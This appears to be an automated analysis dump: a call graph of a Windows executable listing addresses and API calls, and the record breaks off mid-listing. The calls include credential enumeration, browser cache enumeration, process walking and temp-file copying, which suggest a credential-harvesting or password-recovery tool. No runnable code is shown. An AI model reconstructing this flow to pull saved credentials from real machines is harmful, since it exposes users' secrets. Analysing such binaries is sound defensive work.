_wcsicmp 37959->37960 37960->37958 37960->37959 38053 40dce0 37961->38053 37963 40dd3a GetModuleHandleW 38058 40dba7 37963->38058 37967 40dce0 3 API calls 37966->37967 37968 40db99 37967->37968 38130 40dae1 37968->38130 38144 402f3a 37971->38144 37973 412766 37973->37891 37973->37897 37974 4126d3 _wcsicmp 37975 4126a8 37974->37975 37975->37973 37975->37974 37977 41270a 37975->37977 38179 4125f8 7 API calls 37975->38179 37977->37973 38147 411ac5 37977->38147 37988 4125da 37987->37988 37989 4125f0 37988->37989 37990 4125e6 DeleteObject 37988->37990 37992 40b1ab ??3@YAXPAX ??3@YAXPAX 37989->37992 37990->37989 37991->37904 37992->37901 37994 40b640 37993->37994 37995 40b639 ??3@YAXPAX 37993->37995 37996 40b1ab ??3@YAXPAX ??3@YAXPAX 37994->37996 37995->37994 37996->37909 37998 40a83b GetSystemDirectoryW 37997->37998 37999 40a84c wcscpy 37997->37999 37998->37999 38004 409719 wcslen 37999->38004 38002 40a881 LoadLibraryW 38003 40a886 38002->38003 38003->37927 38003->37930 38005 409724 38004->38005 38006 409739 wcscat LoadLibraryW 38004->38006 38005->38006 38007 40972c wcscat 38005->38007 38006->38002 38006->38003 38007->38006 38009 444732 38008->38009 38010 444728 DeleteObject 38008->38010 38020 409cc3 38009->38020 38010->38009 38012 412551 38013 4010f9 38012->38013 38014 401130 38013->38014 38015 401134 GetModuleHandleW LoadIconW 38014->38015 38016 401107 wcsncat 38014->38016 38017 40a7be 38015->38017 38016->38014 38018 40a7d2 38017->38018 38018->37942 38018->38018 38019->37936 38023 409bfd memset wcscpy 38020->38023 38022 409cdb CreateFontIndirectW 38022->38012 38023->38022 38024->37950 38026 40aa14 38025->38026 38027 40aa0a ??3@YAXPAX 38025->38027 38026->37957 38027->38026 38029 40a8eb 38028->38029 38030 40a8df wcslen 38028->38030 38031 40a906 ??3@YAXPAX 38029->38031 38032 40a90f 38029->38032 38030->38029 38034 40a919 38031->38034 38033 4099f4 3 API calls 38032->38033 38033->38034 38035 40a932 38034->38035 38036 40a929 ??3@YAXPAX 38034->38036 38038 4099f4 3 API calls 38035->38038 38037 40a93e memcpy 38036->38037 38037->37950 38039 40a93d 38038->38039 38039->38037 38041 409a41 38040->38041 38042 4099fb malloc 38040->38042 38041->37950 38044 409a37 38042->38044 38045 409a1c 38042->38045 38044->37950 38046 409a30 ??3@YAXPAX 38045->38046 38047 409a20 memcpy 38045->38047 38046->38044 38047->38046 38049 40a9e7 38048->38049 38050 40a9dc ??3@YAXPAX 38048->38050 38052 4099f4 3 API calls 38049->38052 38051 40a9f2 38050->38051 38051->37955 38052->38051 38077 409bca GetModuleFileNameW 38053->38077 38055 40dce6 wcsrchr 38056 40dcf5 38055->38056 38057 40dcf9 wcscat 38055->38057 38056->38057 38057->37963 38078 44db70 38058->38078 38062 40dbfd 38081 4447d9 38062->38081 38065 40dc34 wcscpy wcscpy 38107 40d6f5 38065->38107 38066 40dc1f wcscpy 38066->38065 38069 40d6f5 3 API calls 38070 40dc73 38069->38070 38071 40d6f5 3 API calls 38070->38071 38072 40dc89 38071->38072 38073 40d6f5 3 API calls 38072->38073 38074 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38073->38074 38113 40da80 38074->38113 38077->38055 38079 40dbb4 memset memset 38078->38079 38080 409bca GetModuleFileNameW 38079->38080 38080->38062 38083 4447f4 38081->38083 38082 40dc1b 38082->38065 38082->38066 38083->38082 38084 444807 ??2@YAPAXI 38083->38084 38085 44481f 38084->38085 38086 444873 _snwprintf 38085->38086 38087 4448ab wcscpy 38085->38087 38120 44474a 8 API calls 38086->38120 38089 4448bb 38087->38089 38121 44474a 8 API calls 38089->38121 38090 4448a7 38090->38087 38090->38089 38092 4448cd 38122 44474a 8 API calls 38092->38122 38094 4448e2 38123 44474a 8 API calls 38094->38123 38096 4448f7 38124 44474a 8 API calls 38096->38124 38098 44490c 38125 44474a 8 API calls 38098->38125 38100 444921 38126 44474a 8 API calls 38100->38126 38102 444936 38127 44474a 8 API calls 38102->38127 38104 44494b 38128 44474a 8 API calls 38104->38128 38106 444960 ??3@YAXPAX 38106->38082 38108 44db70 38107->38108 38109 40d702 memset GetPrivateProfileStringW 38108->38109 38110 40d752 38109->38110 38111 40d75c WritePrivateProfileStringW 38109->38111 38110->38111 38112 40d758 38110->38112 38111->38112 38112->38069 38114 44db70 38113->38114 38115 40da8d memset 38114->38115 38116 40daac LoadStringW 38115->38116 38117 40dac6 38116->38117 38117->38116 38119 40dade 38117->38119 38129 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38117->38129 38119->37891 38120->38090 38121->38092 38122->38094 38123->38096 38124->38098 38125->38100 38126->38102 38127->38104 38128->38106 38129->38117 38140 409b98 GetFileAttributesW 38130->38140 38132 40daea 38133 40db63 38132->38133 38134 40daef wcscpy wcscpy GetPrivateProfileIntW 38132->38134 38133->37893 38141 40d65d GetPrivateProfileStringW 38134->38141 38136 40db3e 38142 40d65d GetPrivateProfileStringW 38136->38142 38138 40db4f 38143 40d65d GetPrivateProfileStringW 38138->38143 38140->38132 38141->38136 38142->38138 38143->38133 38180 40eaff 38144->38180 38148 411ae2 memset 38147->38148 38149 411b8f 38147->38149 38220 409bca GetModuleFileNameW 38148->38220 38161 411a8b 38149->38161 38151 411b0a wcsrchr 38152 411b22 wcscat 38151->38152 38153 411b1f 38151->38153 38221 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38152->38221 38153->38152 38155 411b67 38222 402afb 38155->38222 38159 411b7f 38278 40ea13 SendMessageW memset SendMessageW 38159->38278 38162 402afb 27 API calls 38161->38162 38163 411ac0 38162->38163 38164 4110dc 38163->38164 38165 41113e 38164->38165 38170 4110f0 38164->38170 38303 40969c LoadCursorW SetCursor 38165->38303 38167 411143 38304 444a54 38167->38304 38307 4032b4 38167->38307 38325 40b1ab ??3@YAXPAX ??3@YAXPAX 38167->38325 38168 4110f7 _wcsicmp 38168->38170 38169 411157 38171 40ada2 _wcsicmp 38169->38171 38170->38165 38170->38168 38326 410c46 10 API calls 38170->38326 38174 411167 38171->38174 38172 4111af 38174->38172 38175 4111a6 qsort 38174->38175 38175->38172 38179->37975 38181 40eb10 38180->38181 38193 40e8e0 38181->38193 38184 40eb6c memcpy memcpy 38185 40ebb7 38184->38185 38185->38184 38186 40ebf2 ??2@YAPAXI ??2@YAPAXI 38185->38186 38187 40d134 16 API calls 38185->38187 38188 40ec2e ??2@YAPAXI 38186->38188 38190 40ec65 38186->38190 38187->38185 38188->38190 38190->38190 38203 40ea7f 38190->38203 38192 402f49 38192->37975 38194 40e8f2 38193->38194 38195 40e8eb ??3@YAXPAX 38193->38195 38196 40e900 38194->38196 38197 40e8f9 ??3@YAXPAX 38194->38197 38195->38194 38198 40e911 38196->38198 38199 40e90a ??3@YAXPAX 38196->38199 38197->38196 38200 40e931 ??2@YAPAXI ??2@YAPAXI 38198->38200 38201 40e921 ??3@YAXPAX 38198->38201 38202 40e92a ??3@YAXPAX 38198->38202 38199->38198 38200->38184 38201->38202 38202->38200 38204 40aa04 ??3@YAXPAX 38203->38204 38205 40ea88 38204->38205 38206 40aa04 ??3@YAXPAX 38205->38206 38207 40ea90 38206->38207 38208 40aa04 ??3@YAXPAX 38207->38208 38209 40ea98 38208->38209 38210 40aa04 ??3@YAXPAX 38209->38210 38211 40eaa0 38210->38211 38212 40a9ce 4 API calls 38211->38212 38213 40eab3 38212->38213 38214 40a9ce 4 API calls 38213->38214 38215 40eabd 38214->38215 38216 40a9ce 4 API calls 38215->38216 38217 40eac7 38216->38217 38218 40a9ce 4 API calls 38217->38218 38219 40ead1 38218->38219 38219->38192 38220->38151 38221->38155 38279 40b2cc 38222->38279 38224 402b0a 38225 40b2cc 27 API calls 38224->38225 38226 402b23 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402b3a 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402b54 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402b6b 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402b82 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402b99 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402bb0 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402bc7 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402bde 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402bf5 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402c0c 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402c23 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402c3a 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c51 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402c68 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402c7f 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402c99 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402cb3 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402cd5 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402cf0 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402d0b 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402d26 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402d3e 38269->38270 38271 40b2cc 27 API calls 38270->38271 38272 402d59 38271->38272 38273 40b2cc 27 API calls 38272->38273 38274 402d78 38273->38274 38275 40b2cc 27 API calls 38274->38275 38276 402d93 38275->38276 38277 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38276->38277 38277->38159 38278->38149 38282 40b58d 38279->38282 38281 40b2d1 38281->38224 38283 40b5a4 GetModuleHandleW FindResourceW 38282->38283 38284 40b62e 38282->38284 38285 40b5c2 LoadResource 38283->38285 38286 40b5e7 38283->38286 38284->38281 38285->38286 38287 40b5d0 SizeofResource LockResource 38285->38287 38286->38284 38295 40afcf 38286->38295 38287->38286 38289 40b608 memcpy 38298 40b4d3 memcpy 38289->38298 38291 40b61e 38299 40b3c1 18 API calls 38291->38299 38293 40b626 38300 40b04b 38293->38300 38296 40b04b ??3@YAXPAX 38295->38296 38297 40afd7 ??2@YAPAXI 38296->38297 38297->38289 38298->38291 38299->38293 38301 40b051 ??3@YAXPAX 38300->38301 38302 40b05f 38300->38302 38301->38302 38302->38284 38303->38167 38305 444a64 FreeLibrary 38304->38305 38306 444a83 38304->38306 38305->38306 38306->38169 38308 4032c4 38307->38308 38309 40b633 ??3@YAXPAX 38308->38309 38310 403316 38309->38310 38327 44553b 38310->38327 38314 403480 38523 40368c 15 API calls 38314->38523 38316 403489 38317 40b633 ??3@YAXPAX 38316->38317 38318 403495 38317->38318 38318->38169 38319 4033a9 memset memcpy 38320 4033ec wcscmp 38319->38320 38321 40333c 38319->38321 38320->38321 38321->38314 38321->38319 38321->38320 38521 4028e7 11 API calls 38321->38521 38522 40f508 6 API calls 38321->38522 38323 403421 _wcsicmp 38323->38321 38325->38169 38326->38170 38328 445548 38327->38328 38329 445599 38328->38329 38524 40c768 38328->38524 38330 4455a8 memset 38329->38330 38337 4457f2 38329->38337 38607 403988 38330->38607 38341 445854 38337->38341 38709 403e2d memset memset memset memset memset 38337->38709 38338 445672 38618 403fbe memset memset memset memset memset 38338->38618 38339 4458bb memset memset 38345 414c2e 16 API calls 38339->38345 38390 4458aa 38341->38390 38732 403c9c memset memset memset memset memset 38341->38732 38343 44595e memset memset 38350 414c2e 16 API calls 38343->38350 38344 4455e5 38344->38338 38353 44560f 38344->38353 38346 4458f9 38345->38346 38351 40b2cc 27 API calls 38346->38351 38348 445a00 memset memset 38755 414c2e 38348->38755 38349 445b22 38355 445bca 38349->38355 38356 445b38 memset memset memset 38349->38356 38360 44599c 38350->38360 38361 445909 38351->38361 38352 44557a 38387 44558c 38352->38387 38804 41366b FreeLibrary 38352->38804 38364 4087b3 338 API calls 38353->38364 38354 445849 38819 40b1ab ??3@YAXPAX ??3@YAXPAX 38354->38819 38362 445c8b memset memset 38355->38362 38429 445cf0 38355->38429 38365 445bd4 38356->38365 38366 445b98 38356->38366 38369 40b2cc 27 API calls 38360->38369 38370 409d1f 6 API calls 38361->38370 38373 414c2e 16 API calls 38362->38373 38363 44589f 38820 40b1ab ??3@YAXPAX ??3@YAXPAX 38363->38820 38371 445621 38364->38371 38379 414c2e 16 API calls 38365->38379 38366->38365 38375 445ba2 38366->38375 38372 4459ac 38369->38372 38383 445919 38370->38383 38805 4454bf 20 API calls 38371->38805 38385 409d1f 6 API calls 38372->38385 38386 445cc9 38373->38386 38892 4099c6 wcslen 38375->38892 38376 4456b2 38807 40b1ab ??3@YAXPAX ??3@YAXPAX 38376->38807 38378 40b2cc 27 API calls 38391 445a4f 38378->38391 38393 445be2 38379->38393 38380 403335 38520 4452e5 45 API calls 38380->38520 38381 445d3d 38413 40b2cc 27 API calls 38381->38413 38382 445d88 memset memset memset 38396 414c2e 16 API calls 38382->38396 38821 409b98 GetFileAttributesW 38383->38821 38384 445823 38384->38354 38395 4087b3 338 API calls 38384->38395 38397 4459bc 38385->38397 38398 409d1f 6 API calls 38386->38398 38591 444b06 38387->38591 38388 445879 38388->38363 38409 4087b3 338 API calls 38388->38409 38390->38339 38414 44594a 38390->38414 38770 409d1f wcslen wcslen 38391->38770 38402 40b2cc 27 API calls 38393->38402 38395->38384 38406 445dde 38396->38406 38888 409b98 GetFileAttributesW 38397->38888 38408 445ce1 38398->38408 38399 445bb3 38895 445403 memset 38399->38895 38400 445680 38400->38376 38641 4087b3 memset 38400->38641 38403 445bf3 38402->38403 38412 409d1f 6 API calls 38403->38412 38404 445928 38404->38414 38822 40b6ef 38404->38822 38415 40b2cc 27 API calls 38406->38415 38912 409b98 GetFileAttributesW 38408->38912 38409->38388 38423 445c07 38412->38423 38424 445d54 _wcsicmp 38413->38424 38414->38343 38428 4459ed 38414->38428 38427 445def 38415->38427 38416 4459cb 38416->38428 38437 40b6ef 252 API calls 38416->38437 38420 40b2cc 27 API calls 38421 445a94 38420->38421 38775 40ae18 38421->38775 38422 44566d 38422->38337 38692 413d4c 38422->38692 38433 445389 258 API calls 38423->38433 38434 445d71 38424->38434 38499 445d67 38424->38499 38426 445665 38806 40b1ab ??3@YAXPAX ??3@YAXPAX 38426->38806 38435 409d1f 6 API calls 38427->38435 38428->38348 38428->38349 38429->38380 38429->38381 38429->38382 38430 445389 258 API calls 38430->38355 38439 445c17 38433->38439 38913 445093 23 API calls 38434->38913 38442 445e03 38435->38442 38437->38428 38438 4456d8 38444 40b2cc 27 API calls 38438->38444 38445 40b2cc 27 API calls 38439->38445 38441 44563c 38441->38426 38447 4087b3 338 API calls 38441->38447 38914 409b98 GetFileAttributesW 38442->38914 38443 40b6ef 252 API calls 38443->38380 38449 4456e2 38444->38449 38450 445c23 38445->38450 38446 445d83 38446->38380 38447->38441 38808 413fa6 _wcsicmp _wcsicmp 38449->38808 38454 409d1f 6 API calls 38450->38454 38452 445e12 38459 445e6b 38452->38459 38465 40b2cc 27 API calls 38452->38465 38457 445c37 38454->38457 38455 445aa1 38458 445b17 38455->38458 38473 445ab2 memset 38455->38473 38486 409d1f 6 API calls 38455->38486 38782 40add4 38455->38782 38787 445389 38455->38787 38796 40ae51 38455->38796 38456 4456eb 38461 4456fd memset memset memset memset 38456->38461 38462 4457ea 38456->38462 38463 445389 258 API calls 38457->38463 38889 40aebe 38458->38889 38916 445093 23 API calls 38459->38916 38809 409c70 wcscpy wcsrchr 38461->38809 38812 413d29 38462->38812 38468 445c47 38463->38468 38469 445e33 38465->38469 38475 40b2cc 27 API calls 38468->38475 38476 409d1f 6 API calls 38469->38476 38471 445e7e 38472 445f67 38471->38472 38481 40b2cc 27 API calls 38472->38481 38477 40b2cc 27 API calls 38473->38477 38479 445c53 38475->38479 38480 445e47 38476->38480 38477->38455 38478 409c70 2 API calls 38482 44577e 38478->38482 38483 409d1f 6 API calls 38479->38483 38915 409b98 GetFileAttributesW 38480->38915 38485 445f73 38481->38485 38487 409c70 2 API calls 38482->38487 38488 445c67 38483->38488 38490 409d1f 6 API calls 38485->38490 38486->38455 38491 44578d 38487->38491 38492 445389 258 API calls 38488->38492 38489 445e56 38489->38459 38495 445e83 memset 38489->38495 38493 445f87 38490->38493 38491->38462 38498 40b2cc 27 API calls 38491->38498 38492->38355 38919 409b98 GetFileAttributesW 38493->38919 38497 40b2cc 27 API calls 38495->38497 38500 445eab 38497->38500 38501 4457a8 38498->38501 38499->38380 38499->38443 38502 409d1f 6 API calls 38500->38502 38503 409d1f 6 API calls 38501->38503 38504 445ebf 38502->38504 38505 4457b8 38503->38505 38506 40ae18 9 API calls 38504->38506 38811 409b98 GetFileAttributesW 38505->38811 38516 445ef5 38506->38516 38508 4457c7 38508->38462 38510 4087b3 338 API calls 38508->38510 38509 40ae51 9 API calls 38509->38516 38510->38462 38511 445f5c 38513 40aebe FindClose 38511->38513 38512 40add4 2 API calls 38512->38516 38513->38472 38514 40b2cc 27 API calls 38514->38516 38515 409d1f 6 API calls 38515->38516 38516->38509 38516->38511 38516->38512 38516->38514 38516->38515 38518 445f3a 38516->38518 38917 409b98 GetFileAttributesW 38516->38917 38918 445093 23 API calls 38518->38918 38520->38321 38521->38323 38522->38321 38523->38316 38525 40c775 38524->38525 38920 40b1ab ??3@YAXPAX ??3@YAXPAX 38525->38920 38527 40c788 38921 40b1ab ??3@YAXPAX ??3@YAXPAX 38527->38921 38529 40c790 38922 40b1ab ??3@YAXPAX ??3@YAXPAX 38529->38922 38531 40c798 38532 40aa04 ??3@YAXPAX 38531->38532 38533 40c7a0 38532->38533 38923 40c274 memset 38533->38923 38538 40a8ab 9 API calls 38539 40c7c3 38538->38539 38540 40a8ab 9 API calls 38539->38540 38541 40c7d0 38540->38541 38952 40c3c3 38541->38952 38545 40c7e5 38546 40c877 38545->38546 38547 40c86c 38545->38547 38553 40c634 49 API calls 38545->38553 38977 40a706 38545->38977 38554 40bdb0 38546->38554 38994 4053fe 39 API calls 38547->38994 38553->38545 39184 404363 38554->39184 38557 40bf5d 39204 40440c 38557->39204 38559 40bdee 38559->38557 38562 40b2cc 27 API calls 38559->38562 38560 40bddf CredEnumerateW 38560->38559 38563 40be02 wcslen 38562->38563 38563->38557 38565 40be1e 38563->38565 38564 40be26 _wcsncoll 38564->38565 38565->38557 38565->38564 38568 40be7d memset 38565->38568 38569 40bea7 memcpy 38565->38569 38570 40bf11 wcschr 38565->38570 38571 40b2cc 27 API calls 38565->38571 38573 40bf43 LocalFree 38565->38573 39207 40bd5d 28 API calls 38565->39207 39208 404423 38565->39208 38568->38565 38568->38569 38569->38565 38569->38570 38570->38565 38572 40bef6 _wcsnicmp 38571->38572 38572->38565 38572->38570 38573->38565 38574 4135f7 39221 4135e0 38574->39221 38577 40b2cc 27 API calls 38578 41360d 38577->38578 38579 40a804 8 API calls 38578->38579 38580 413613 38579->38580 38581 41361b 38580->38581 38582 41363e 38580->38582 38583 40b273 27 API calls 38581->38583 38584 4135e0 FreeLibrary 38582->38584 38585 413625 GetProcAddress 38583->38585 38586 413643 38584->38586 38585->38582 38587 413648 38585->38587 38586->38352 38588 413658 38587->38588 38589 4135e0 FreeLibrary 38587->38589 38588->38352 38590 413666 38589->38590 38590->38352 39224 4449b9 38591->39224 38594 444c1f 38594->38329 38595 4449b9 42 API calls 38597 444b4b 38595->38597 38596 444c15 38599 4449b9 42 API calls 38596->38599 38597->38596 39245 444972 GetVersionExW 38597->39245 38599->38594 38600 444b99 memcmp 38605 444b8c 38600->38605 38601 444c0b 39249 444a85 42 API calls 38601->39249 38605->38600 38605->38601 39246 444aa5 42 API calls 38605->39246 39247 40a7a0 GetVersionExW 38605->39247 39248 444a85 42 API calls 38605->39248 38608 40399d 38607->38608 39250 403a16 38608->39250 38610 403a09 39264 40b1ab ??3@YAXPAX ??3@YAXPAX 38610->39264 38612 403a12 wcsrchr 38612->38344 38613 4039a3 38613->38610 38616 4039f4 38613->38616 39261 40a02c CreateFileW 38613->39261 38616->38610 38617 4099c6 2 API calls 38616->38617 38617->38610 38619 414c2e 16 API calls 38618->38619 38620 404048 38619->38620 38621 414c2e 16 API calls 38620->38621 38622 404056 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 404073 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 40408e 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 4040a6 38627->38628 38629 403af5 20 API calls 38628->38629 38630 4040ba 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040cb 38631->38632 39291 40414f memset 38632->39291 38634 404140 39305 40b1ab ??3@YAXPAX ??3@YAXPAX 38634->39305 38636 4040ec memset 38639 4040e0 38636->38639 38637 404148 38637->38400 38638 4099c6 2 API calls 38638->38639 38639->38634 38639->38636 38639->38638 38640 40a8ab 9 API calls 38639->38640 38640->38639 39318 40a6e6 WideCharToMultiByte 38641->39318 38643 4087ed 39319 4095d9 memset 38643->39319 38646 408953 38646->38400 38647 408809 memset memset memset memset memset 38648 40b2cc 27 API calls 38647->38648 38649 4088a1 38648->38649 38650 409d1f 6 API calls 38649->38650 38651 4088b1 38650->38651 38652 40b2cc 27 API calls 38651->38652 38653 4088c0 38652->38653 38654 409d1f 6 API calls 38653->38654 38655 4088d0 38654->38655 38656 40b2cc 27 API calls 38655->38656 38657 4088df 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 4088ef 38658->38659 38660 40b2cc 27 API calls 38659->38660 38661 4088fe 38660->38661 38662 409d1f 6 API calls 38661->38662 38663 40890e 38662->38663 38664 40b2cc 27 API calls 38663->38664 38665 40891d 38664->38665 38693 40b633 ??3@YAXPAX 38692->38693 38694 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38693->38694 38695 413f00 Process32NextW 38694->38695 38696 413da5 OpenProcess 38695->38696 38697 413f17 CloseHandle 38695->38697 38698 413df3 memset 38696->38698 38703 413eb0 38696->38703 38697->38438 39630 413f27 38698->39630 38700 413ebf ??3@YAXPAX 38700->38703 38701 4099f4 3 API calls 38701->38703 38703->38695 38703->38700 38703->38701 38704 413e37 GetModuleHandleW 38705 413e1f 38704->38705 38706 413e46 GetProcAddress 38704->38706 38705->38704 39635 413959 38705->39635 39651 413ca4 38705->39651 38706->38705 38708 413ea2 CloseHandle 38708->38703 38710 414c2e 16 API calls 38709->38710 38711 403eb7 38710->38711 38712 414c2e 16 API calls 38711->38712 38713 403ec5 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 403ee2 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403efd 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403f15 38718->38719 38720 403af5 20 API calls 38719->38720 38721 403f29 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f3a 38722->38723 38724 40414f 33 API calls 38723->38724 38725 403f4f 38724->38725 38726 403faf 38725->38726 38728 403f5b memset 38725->38728 38730 4099c6 2 API calls 38725->38730 38731 40a8ab 9 API calls 38725->38731 39665 40b1ab ??3@YAXPAX ??3@YAXPAX 38726->39665 38728->38725 38729 403fb7 38729->38384 38730->38725 38731->38725 38733 414c2e 16 API calls 38732->38733 38734 403d26 38733->38734 38735 414c2e 16 API calls 38734->38735 38736 403d34 38735->38736 38737 409d1f 6 API calls 38736->38737 38738 403d51 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d6c 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d84 38741->38742 38743 403af5 20 API calls 38742->38743 38744 403d98 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403da9 38745->38746 38747 40414f 33 API calls 38746->38747 38748 403dbe 38747->38748 38749 403e1e 38748->38749 38750 403dca memset 38748->38750 38753 4099c6 2 API calls 38748->38753 38754 40a8ab 9 API calls 38748->38754 39666 40b1ab ??3@YAXPAX ??3@YAXPAX 38749->39666 38750->38748 38752 403e26 38752->38388 38753->38748 38754->38748 38756 414b81 9 API calls 38755->38756 38757 414c40 38756->38757 38758 414c73 memset 38757->38758 39667 409cea 38757->39667 38759 414c94 38758->38759 39670 414592 RegOpenKeyExW 38759->39670 38762 414c64 38762->38378 38764 414cc1 38765 414cf4 wcscpy 38764->38765 39671 414bb0 wcscpy 38764->39671 38765->38762 38767 414cd2 39672 4145ac RegQueryValueExW 38767->39672 38769 414ce9 RegCloseKey 38769->38765 38771 409d62 38770->38771 38772 409d43 wcscpy 38770->38772 38771->38420 38773 409719 2 API calls 38772->38773 38774 409d51 wcscat 38773->38774 38774->38771 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38455 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38455 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38794 4453c4 38788->38794 38789 40ae51 9 API calls 38789->38794 38790 4453f3 38792 40aebe FindClose 38790->38792 38791 40add4 2 API calls 38791->38794 38793 4453fe 38792->38793 38793->38455 38794->38789 38794->38790 38794->38791 38795 445403 253 API calls 38794->38795 38795->38794 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38455 38803->38802 38804->38387 38805->38441 38806->38422 38807->38422 38808->38456 38810 409c89 38809->38810 38810->38478 38811->38508 38813 413d39 38812->38813 38814 413d2f FreeLibrary 38812->38814 38815 40b633 ??3@YAXPAX 38813->38815 38814->38813 38816 413d42 38815->38816 38817 40b633 ??3@YAXPAX 38816->38817 38818 413d4a 38817->38818 38818->38337 38819->38341 38820->38390 38821->38404 38823 44db70 38822->38823 38824 40b6fc memset 38823->38824 38825 409c70 2 API calls 38824->38825 38826 40b732 wcsrchr 38825->38826 38827 40b743 38826->38827 38828 40b746 memset 38826->38828 38827->38828 38829 40b2cc 27 API calls 38828->38829 38830 40b76f 38829->38830 38831 409d1f 6 API calls 38830->38831 38832 40b783 38831->38832 39673 409b98 GetFileAttributesW 38832->39673 38834 40b792 38835 40b7c2 38834->38835 38836 409c70 2 API calls 38834->38836 39674 40bb98 38835->39674 38838 40b7a5 38836->38838 38840 40b2cc 27 API calls 38838->38840 38844 40b7b2 38840->38844 38841 40b837 FindCloseChangeNotification 38843 40b83e memset 38841->38843 38842 40b817 39708 409a45 GetTempPathW 38842->39708 39707 40a6e6 WideCharToMultiByte 38843->39707 38847 409d1f 6 API calls 38844->38847 38847->38835 38848 40b827 CopyFileW 38848->38843 38849 40b866 38850 444432 121 API calls 38849->38850 38851 40b879 38850->38851 38852 40bad5 38851->38852 38853 40b273 27 API calls 38851->38853 38854 40baeb 38852->38854 38855 40bade DeleteFileW 38852->38855 38856 40b89a 38853->38856 38857 40b04b ??3@YAXPAX 38854->38857 38855->38854 38858 438552 134 API calls 38856->38858 38859 40baf3 38857->38859 38860 40b8a4 38858->38860 38859->38414 38861 40bacd 38860->38861 38863 4251c4 137 API calls 38860->38863 38862 443d90 111 API calls 38861->38862 38862->38852 38886 40b8b8 38863->38886 38864 40bac6 39720 424f26 123 API calls 38864->39720 38865 40b8bd memset 39711 425413 17 API calls 38865->39711 38868 425413 17 API calls 38868->38886 38871 40a71b MultiByteToWideChar 38871->38886 38872 40a734 MultiByteToWideChar 38872->38886 38875 40b9b5 memcmp 38875->38886 38876 4099c6 2 API calls 38876->38886 38877 404423 37 API calls 38877->38886 38879 40bb3e memset memcpy 39721 40a734 MultiByteToWideChar 38879->39721 38880 4251c4 137 API calls 38880->38886 38883 40bb88 LocalFree 38883->38886 38886->38864 38886->38865 38886->38868 38886->38871 38886->38872 38886->38875 38886->38876 38886->38877 38886->38879 38886->38880 38887 40ba5f memcmp 38886->38887 39712 4253ef 16 API calls 38886->39712 39713 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38886->39713 39714 4253af 17 API calls 38886->39714 39715 4253cf 17 API calls 38886->39715 39716 447280 memset 38886->39716 39717 447960 memset memcpy memcpy memcpy 38886->39717 39718 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38886->39718 39719 447920 memcpy memcpy memcpy 38886->39719 38887->38886 38888->38416 38890 40aed1 38889->38890 38891 40aec7 FindClose 38889->38891 38890->38349 38891->38890 38893 4099d7 38892->38893 38894 4099da memcpy 38892->38894 38893->38894 38894->38399 38896 40b2cc 27 API calls 38895->38896 38897 44543f 38896->38897 38898 409d1f 6 API calls 38897->38898 38899 44544f 38898->38899 39813 409b98 GetFileAttributesW 38899->39813 38901 44545e 38902 445476 38901->38902 38903 40b6ef 252 API calls 38901->38903 38904 40b2cc 27 API calls 38902->38904 38903->38902 38905 445482 38904->38905 38906 409d1f 6 API calls 38905->38906 38907 445492 38906->38907 39814 409b98 GetFileAttributesW 38907->39814 38909 4454a1 38910 4454b9 38909->38910 38911 40b6ef 252 API calls 38909->38911 38910->38430 38911->38910 38912->38429 38913->38446 38914->38452 38915->38489 38916->38471 38917->38516 38918->38516 38919->38499 38920->38527 38921->38529 38922->38531 38924 414c2e 16 API calls 38923->38924 38925 40c2ae 38924->38925 38995 40c1d3 38925->38995 38930 40c3be 38947 40a8ab 38930->38947 38931 40afcf 2 API calls 38932 40c2fd FindFirstUrlCacheEntryW 38931->38932 38933 40c3b6 38932->38933 38934 40c31e wcschr 38932->38934 38935 40b04b ??3@YAXPAX 38933->38935 38936 40c331 38934->38936 38937 40c35e FindNextUrlCacheEntryW 38934->38937 38935->38930 38938 